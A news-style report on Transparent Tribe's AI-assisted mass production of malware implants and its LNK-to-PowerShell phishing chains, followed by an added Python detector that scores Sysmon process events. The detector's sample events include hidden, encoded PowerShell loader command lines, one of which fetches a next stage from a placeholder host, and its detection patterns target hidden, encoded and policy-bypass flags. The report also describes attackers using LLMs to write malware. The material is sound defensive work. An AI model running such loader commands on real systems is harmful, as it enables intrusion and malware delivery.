The Pakistan-aligned threat actor known as Transparent Tribe has adopted AI-powered coding tools to mass-produce malware implants, aiming to flood target environments with disposable binaries written in a spread of different languages. According to Bitdefender, the activity focuses on generating a “high-volume, mediocre mass of implants” built with lesser-known languages such as Nim, Zig and Crystal, and utilises trusted services like Slack, Discord, Supabase and Google Sheets so that its traffic blends in with legitimate use of those platforms and evades detection.
The campaign is described as an AI-assisted shift toward malware industrialisation rather than a leap in technical sophistication; researchers note that LLMs lower the barrier for threat actors to produce working code in languages they do not otherwise know. The latest attacks have targeted the Indian government and its embassies in multiple countries, with the group (also tracked as APT36) using LinkedIn to identify high-value targets.
Infection chains reportedly begin with phishing: LNK shortcut files delivered inside ZIP or ISO archives, or PDF lures, lead to PowerShell execution and then to the deployment of off-the-shelf frameworks such as Cobalt Strike and Havoc alongside the custom implants, in what the researchers describe as a hybrid approach.
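The first hop of that chain, a double-clicked LNK that Explorer turns into a PowerShell process, is the point most defenders can catch with process telemetry alone. The routine below is an added example written for this page, not code from Bitdefender or from the article: it scores constructed Sysmon Event ID 1 style events (field names as Sysmon logs them) for PowerShell spawned by explorer.exe, boosting the score when the working directory is Explorer's own ZIP-viewer extraction folder (`%TEMP%\TempN_<archive>.zip\`) or the root of a non-system drive letter (how a mounted ISO appears; treating any D: to Z: root as a candidate is an assumption of this example), and when the command line carries hidden-window, no-profile, policy-bypass or encoded-command flags. The sample events, including the base64 placeholder, are made up.

```python
"""Added example (not from the article or Bitdefender): score Sysmon-style
process-creation events for the LNK-in-archive -> PowerShell hop described
in the text. All sample events below are constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 fields, named as Sysmon logs them."""
    Image: str
    ParentImage: str
    CommandLine: str
    CurrentDirectory: str


POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
EXPLORER = re.compile(r"\\explorer\.exe$", re.IGNORECASE)
# Flags that hide the window, skip the profile, bypass execution policy or
# pass an encoded script: the usual shape of an LNK-to-PowerShell loader.
SUSPICIOUS_FLAGS = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand|nop|noprofile|noni|noninteractive)\b"
    r"|-w(?:indowstyle)?\s+hidden"
    r"|-e(?:xecutionpolicy|p)\s+bypass",
    re.IGNORECASE,
)
# Explorer's built-in ZIP viewer extracts a double-clicked item to
# %TEMP%\TempN_<archive>.zip\ before running it.
ZIP_VIEWER_DIR = re.compile(r"\\Temp\\Temp\d+_[^\\]+\.zip\\", re.IGNORECASE)
# Heuristic (assumption of this example): a mounted ISO presents as the root
# of a non-system drive letter, so a working directory of e.g. E:\ is a hint.
DRIVE_ROOT = re.compile(r"^[D-Z]:\\$", re.IGNORECASE)

ALERT_THRESHOLD = 3


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Only PowerShell started by Explorer is scored,
    since that is the parent/child pair a double-clicked LNK produces."""
    if not (POWERSHELL.search(ev.Image) and EXPLORER.search(ev.ParentImage)):
        return 0, []
    score, reasons = 1, ["powershell spawned by explorer.exe (LNK double-click?)"]
    if ZIP_VIEWER_DIR.search(ev.CurrentDirectory):
        score += 2
        reasons.append("working dir is Explorer's ZIP extraction folder")
    elif DRIVE_ROOT.match(ev.CurrentDirectory):
        score += 1
        reasons.append("working dir is a non-system drive root (mounted ISO?)")
    if SUSPICIOUS_FLAGS.search(ev.CommandLine):
        score += 2
        reasons.append("hidden/encoded/bypass PowerShell flags")
    return score, reasons


def detect(events: list[ProcessEvent]) -> list[tuple[str, int, list[str]]]:
    """Return (command line, score, reasons) for every event at or above threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append((ev.CommandLine, score, reasons))
    return alerts


PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample events; none are real telemetry.
SAMPLE_EVENTS = [
    # LNK run straight out of Explorer's ZIP viewer -> hidden, encoded PowerShell
    ProcessEvent(PS_IMAGE, "C:\\Windows\\explorer.exe",
                 '"powershell.exe" -w hidden -nop -ep bypass -enc SQBFAFgAIAAuAC4ALgA=',
                 "C:\\Users\\alice\\AppData\\Local\\Temp\\Temp1_invite.zip\\"),
    # LNK on a mounted ISO (E:) -> hidden PowerShell fetching a next stage
    ProcessEvent(PS_IMAGE, "C:\\Windows\\explorer.exe",
                 '"powershell.exe" -WindowStyle Hidden -Command "iwr https://example.invalid/s"',
                 "E:\\"),
    # Benign: user opens a plain PowerShell shortcut from the desktop
    ProcessEvent(PS_IMAGE, "C:\\Windows\\explorer.exe", '"powershell.exe"',
                 "C:\\Users\\alice\\"),
    # Benign: scheduled task running a script (parent is not Explorer)
    ProcessEvent(PS_IMAGE, "C:\\Windows\\System32\\svchost.exe",
                 "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
                 "C:\\Windows\\System32\\"),
]

if __name__ == "__main__":
    for cmd, score, reasons in detect(SAMPLE_EVENTS):
        print(f"[{score}] {cmd}\n    " + "; ".join(reasons))
```

The scoring deliberately stays quiet on the scheduled-task event even though it uses `-NoProfile`: the parent is svchost.exe, not Explorer, so the LNK pattern does not apply. In a real deployment the ZIP-viewer and drive-root checks are the ones to tune first, since users who legitimately mount ISOs or run shortcuts from archives will trip them.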